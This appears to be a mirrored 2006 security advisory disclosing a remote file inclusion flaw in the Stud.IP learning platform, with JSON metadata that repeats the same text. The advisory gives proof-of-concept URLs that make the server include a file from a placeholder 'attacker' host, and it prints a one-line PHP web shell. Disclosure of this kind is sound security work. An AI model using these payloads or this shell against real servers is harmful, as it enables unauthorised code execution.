Search...

StudIP1302.txt

2006-07-02T00:00:00

ID PACKETSTORM:47924
Type packetstorm
Reporter Hamid Ebadi
Modified 2006-07-02T00:00:00

Description

                                        
                                            `/*------------------------------------------------  
IHS Public advisory  
-------------------------------------------------*/  
  
Stud.IP Remote File Inclusion  
Stud.IP is a learning and an information management  
system for universities, educational facilities and  
enterprises.  
  
http://www.studip.de  
http://www.data-quest.de  
http://www.sourceforge.net/projects/studip  
  
  
Discovered by Hamid Ebadi Credit :  
all go to IHS team (IHS : IRAN HOMELAND SECURITY)  
www.ihsteam.com (persian)  
www.ihsteam.net (english)  
  
  
The original article can be found at:  
http://www.hamid.ir/security/  
http://www.IHSteam.com  
  
Vulnerable Systems:  
studip 1.3.0-2 and below  
  
  
Input passed to the "_PHPLIB[libdir]" parameter in  
studip-phplib/oohforms.inc and to the  
"ABSOLUTE_PATH_STUDIP" parameter in  
studip-htdocs/archiv_assi.php is not properly verified  
before being used to include files.  
This can be exploited to execute arbitrary PHP code by  
including files from local or external resources.  
  
POC Exploits:  
  
The following URL will cause the server to include  
external files  
http://localhost/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://attacker/cmd.gif?  
http://localhost/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://attacker/cmd.gif?  
  
cmd.gif  
&lt;?  
passthru($_GET['cmd']);  
?&gt;  
  
Solution:  
Edit the source code to ensure that input is properly verified.  
  
  
greeting :  
LorD , NT , C0d3r of IHS  
  
  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2006-07-02T00:00:00", "reporter": "Hamid Ebadi", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "79e98bca04dcb5e2d4b23d7f01cb6973"}, {"key": "modified", "hash": "76c95adc5668d0d8cee84de2efefc10a"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "76c95adc5668d0d8cee84de2efefc10a"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2b34da82979f38567536da71fd5cb61a"}, {"key": "sourceData", "hash": "770efcb12a704d8333e657c10945a183"}, {"key": "sourceHref", "hash": "d12169a8f17f68d3ea8db63dd0da649e"}, {"key": "title", "hash": "834443b7d945317cafd43897125e2b58"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`/*------------------------------------------------ \nIHS Public advisory \n-------------------------------------------------*/ \n \nStud.IP Remote File Inclusion \nStud.IP is a learning and an information management \nsystem for universities, educational facilities and \nenterprises. \n \nhttp://www.studip.de \nhttp://www.data-quest.de \nhttp://www.sourceforge.net/projects/studip \n \n \nDiscovered by Hamid Ebadi Credit : \nall go to IHS team (IHS : IRAN HOMELAND SECURITY) \nwww.ihsteam.com (persian) \nwww.ihsteam.net (english) \n \n \nThe original article can be found at: \nhttp://www.hamid.ir/security/ \nhttp://www.IHSteam.com \n \nVulnerable Systems: \nstudip 1.3.0-2 and below \n \n \nInput passed to the \"_PHPLIB[libdir]\" parameter in \nstudip-phplib/oohforms.inc and to the \n\"ABSOLUTE_PATH_STUDIP\" parameter in \nstudip-htdocs/archiv_assi.php is not properly verified \nbefore being used to include files. \nThis can be exploited to execute arbitrary PHP code by \nincluding files from local or external resources. \n \nPOC Exploits: \n \nThe following URL will cause the server to include \nexternal files \nhttp://localhost/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://attacker/cmd.gif? \nhttp://localhost/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://attacker/cmd.gif? \n \ncmd.gif \n<? \npassthru($_GET['cmd']); \n?> \n \nSolution: \nEdit the source code to ensure that input is properly verified. \n \n \ngreeting : \nLorD , NT , C0d3r of IHS \n \n \n`\n", "viewCount": 1, "history": [], "lastseen": "2016-11-03T10:20:14", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/47924/StudIP1302.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/47924/StudIP1302.txt", "title": "StudIP1302.txt", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:20:14", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:14", "rev": 2}, "vulnersScore": -0.2}, "references": [], "id": "PACKETSTORM:47924", "hash": "61ad6769d0650d45e9406bc8d3ae20e544039f34cab05692afa652f789534bc0", "edition": 1, "cvelist": [], "modified": "2006-07-02T00:00:00", "description": ""}